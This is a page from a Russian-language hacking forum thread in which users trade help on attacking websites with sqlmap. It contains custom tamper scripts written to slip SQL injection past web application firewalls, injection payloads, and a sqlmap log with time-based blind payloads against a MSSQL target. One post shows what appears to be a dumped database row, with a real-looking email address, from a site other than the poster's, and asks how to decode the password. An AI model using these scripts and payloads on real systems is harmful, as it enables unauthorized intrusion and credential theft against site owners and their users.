HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #871  
Старый 18.03.2019, 11:34
hibar1Xs
Новичок
Регистрация: 30.01.2019
Сообщений: 15
Провел на форуме:
3935

Репутация: 3
По умолчанию

Цитата:
Сообщение от BenderMR  

Подкиньте название тампера для инжекта такого вида: target.com/index.php?id=4668' /*!50000uNiOn*/ /*!50000sElEcT*/ 'here', 1-- -.
Руками раскрутить проблемы нет, но не знаю как мапу скормить
В tamper/versionedkeywords.py где /*!%s*/ поменять на своё значение /*!12345%s*/

и использовать randomcase

--tamper=randomcase,versionedkeywords
 
Ответить с цитированием

  #872  
Старый 19.03.2019, 06:39
BenderMR
Познающий
Регистрация: 23.02.2019
Сообщений: 65
Провел на форуме:
22457

Репутация: 10
По умолчанию

Цитата:
Сообщение от hibar1Xs  

В tamper/versionedkeywords.py где
/*!%s*/
поменять на своё значение
/*!12345%s*/
и использовать
randomcase

--tamper=randomcase,versionedkeywords

Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.

Может есть кто то делал подобные тамперы под informatio_schema?
 
Ответить с цитированием

  #873  
Старый 19.03.2019, 08:22
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от BenderMR  

Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
Может есть кто то делал подобные тамперы под informatio_schema?
Создаешь в папке с тампером новый файл, как пример:

Код:
#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that filter the CONCAT() function

    >>> tamper('CONCAT(1,2)')
    'CONCAT_WS(MID(CHAR(0),0,0),1,2)'%73CHEMA
    """

    if payload:
        payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
        payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
        payload = payload.replace("table_name", "/*!12345%74able_name*/")
        payload = payload.replace("SCHEMA", "%73CHEMA")   
        payload = payload.replace("schema", "%73chema")       

    return payload
и играешься как хочешь, с нужными функциями
 
Ответить с цитированием

  #874  
Старый 19.03.2019, 10:54
hibar1Xs
Новичок
Регистрация: 30.01.2019
Сообщений: 15
Провел на форуме:
3935

Репутация: 3
По умолчанию

Цитата:
Сообщение от BenderMR  

Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
Может есть кто то делал подобные тамперы под informatio_schema?
В repStr перечислять нужное через "|" (регистр неважен) и экранировать спец. символы :

Код:
#!/usr/bin/env python

import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHER

def tamper(payload, **kwargs):

    def process(match):
        word = match.group('word')
        return match.group().replace(word, "/*!12345%s*/" % word)

    retVal = payload
    if payload:
        repStr = "table_name|information_schema"
        retVal = re.sub(r"(?P" + repStr + ")", lambda match: process(match), retVal,flags=re.IGNORECASE)

    return retVal
 
Ответить с цитированием

  #875  
Старый 19.03.2019, 17:20
MrBa
Новичок
Регистрация: 10.01.2017
Сообщений: 11
Провел на форуме:
3505

Репутация: 0
По умолчанию

Доброго здоровья всем форумчанам!

Начал более глубоко вникать в построение запросов. За основу взял sqlmap. Опишу две ситуации которые мне не удалось никак для себя объяснить.

Ситуация 1

Есть некий сайт, который я раскрутил руками с помощью UNION и получил имя текущей БД. Дальше двигаться не стал. Никакого WAV там нет, тестил whatwav. Ну и вручную всё вошло без лишних вопросов. Заряжаю в sqlmap, --technique=U. В итоге, sqlmap крутил-крутил, потом сказал «ой, всё!» и выдал, что слишком много ошибок 404 и сослался на WAF. WTF?

Ситуация 2

Сайт полностью раскручен sqlmap и снова --technique=U. В данный момент вникаю именно в эту технику. Получаю список БД. Там же, в конце процесса sqlmap выдает готовый payload с помощью которого он получил результат. Я понимаю sql и мне всё понятно. Беру этот payload, вставляю в броузер. В итоге выдаёт ошибку синтаксиса. Почему?

Буду благодарен любой помощи в решении этих проблем.
 
Ответить с цитированием

  #876  
Старый 20.03.2019, 07:02
MrBa
Новичок
Регистрация: 10.01.2017
Сообщений: 11
Провел на форуме:
3505

Репутация: 0
По умолчанию

Цитата:
Сообщение от noj  

Привет, посоветовали обратиться к вам. Весь день игрался с sqlmap. Добрался до дб, но вот получить столбцы никак.
Запрос: -u "
https://www.site.com/ParticipationList.asp?Program=TCTS
" --random-agent --risk=1 --level=1 --timeout=10 -D master --tables --threads 10 --hex
Отдает пустые значения, в другой базе из 68 столбцов показало 2: А и 5. Использовал темперы: ifnull2casewhenisnull, between, charunicodeencode и ещё с десяток. Результат на месте.
Подскажет может кто в чем ошибка.
Код:
[20:06:20] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[20:06:20] [PAYLOAD] TCTS' IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM master..sysobjects WHERE xtype = CHAR(85)),1,1))>48) WAITFOR DELAY '0:0:5'--
[20:06:20] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[20:06:20] [PAYLOAD] TCTS' IF(UNICODE(SUBSTRING((SELECT master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM master..sysobjects WHERE xtype = CHAR(85)),1,1))>1) WAITFOR DELAY '0:0:5'--
[20:06:21] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[20:06:21] [INFO] retrieved:
[20:06:21] [DEBUG] performed 4 queries in 1.94 seconds
[20:06:21] [WARNING] unable to retrieve the number of tables for database 'master'
[20:06:21] [CRITICAL] unable to retrieve the tables for any database
[20:06:21] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 24 times
[20:06:21] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
тип:
Код:
Parameter: Program (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Program=TCTS' AND 1076=1076 AND 'glgo'='glgo

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: Program=TCTS' WAITFOR DELAY '0:0:5'--
Попробуйте утилиту whatwav. Она определяет тип WAF и тампер(ы), который нужно использовать. Но это не факт. Попробуйте руками. Здесь на борде есть статьи как обходить WAV
 
Ответить с цитированием

  #877  
Старый 22.03.2019, 03:03
BenderMR
Познающий
Регистрация: 23.02.2019
Сообщений: 65
Провел на форуме:
22457

Репутация: 10
По умолчанию

Джентельмены, реально ли через sqlmap обновить поле в колонке читая текст из filename.txt используя --sql-shell?

Что то типа UPDATE tablename SET textcolumn= filename.txt WHERE id=1?

P.S есть ли вообще такая возможность, чтобы текст со своего файла туда залить и как такой запрос должен выглядить
 
Ответить с цитированием

  #878  
Старый 22.03.2019, 12:13
hibar1Xs
Новичок
Регистрация: 30.01.2019
Сообщений: 15
Провел на форуме:
3935

Репутация: 3
По умолчанию

Цитата:
Сообщение от BenderMR  

Джентельмены, реально ли через sqlmap обновить поле в колонке читая текст из filename.txt используя --sql-shell?
Что то типа UPDATE tablename SET textcolumn= filename.txt WHERE id=1?
P.S есть ли вообще такая возможность, чтобы текст со своего файла туда залить и как такой запрос должен выглядить
Если SELECT, то обновить можно при условии запроса в бд через mysqli_multi_query или PDO::query. Или тип бд mssql.

Если INSERT, то можно обновить поле при наличии PRIMARY KEY в таблице.

https://dev.mysql.com/doc/refman/8.0...duplicate.html

В SET textcolumn = 'содержимое filename.txt'
 
Ответить с цитированием

  #879  
Старый 22.03.2019, 13:57
hibar1Xs
Новичок
Регистрация: 30.01.2019
Сообщений: 15
Провел на форуме:
3935

Репутация: 3
По умолчанию

Цитата:
Сообщение от MrBa  

Доброго здоровья всем форумчанам!
Начал более глубоко вникать в построение запросов. За основу взял sqlmap. Опишу две ситуации которые мне не удалось никак для себя объяснить.
Ситуация 1
Есть некий сайт, который я раскрутил руками с помощью UNION и получил имя текущей БД. Дальше двигаться не стал. Никакого WAV там нет, тестил whatwav. Ну и вручную всё вошло без лишних вопросов. Заряжаю в sqlmap, --technique=U. В итоге, sqlmap крутил-крутил, потом сказал «ой, всё!» и выдал, что слишком много ошибок 404 и сослался на WAF. WTF?
Ситуация 2
Сайт полностью раскручен sqlmap и снова --technique=U. В данный момент вникаю именно в эту технику. Получаю список БД. Там же, в конце процесса sqlmap выдает готовый payload с помощью которого он получил результат. Я понимаю sql и мне всё понятно. Беру этот payload, вставляю в броузер. В итоге выдаёт ошибку синтаксиса. Почему?
Буду благодарен любой помощи в решении этих проблем.
sqlmap генерирует свой префикс и суффикс. Если использовался при раскрутке, то укзать через --prefix --suffix.

https://github.com/sqlmapproject/sqlmap/wiki/Usage
 
Ответить с цитированием

  #880  
Старый 24.03.2019, 22:44
Xsite
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776

Репутация: 0
По умолчанию

скуля в юнион

мускул(MariaDB fork)

проблема с кодировкой password (blob)

вид:| Linkinsgirl69@yahoo.com | G/\x12\\?ЦУ?дЬЧП?XP_ | 2 |

попробывал выводить с --binary-fields=password , c --hex , вид не меняется .

Есть ли способы вытащить пароль в нормальном виде?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.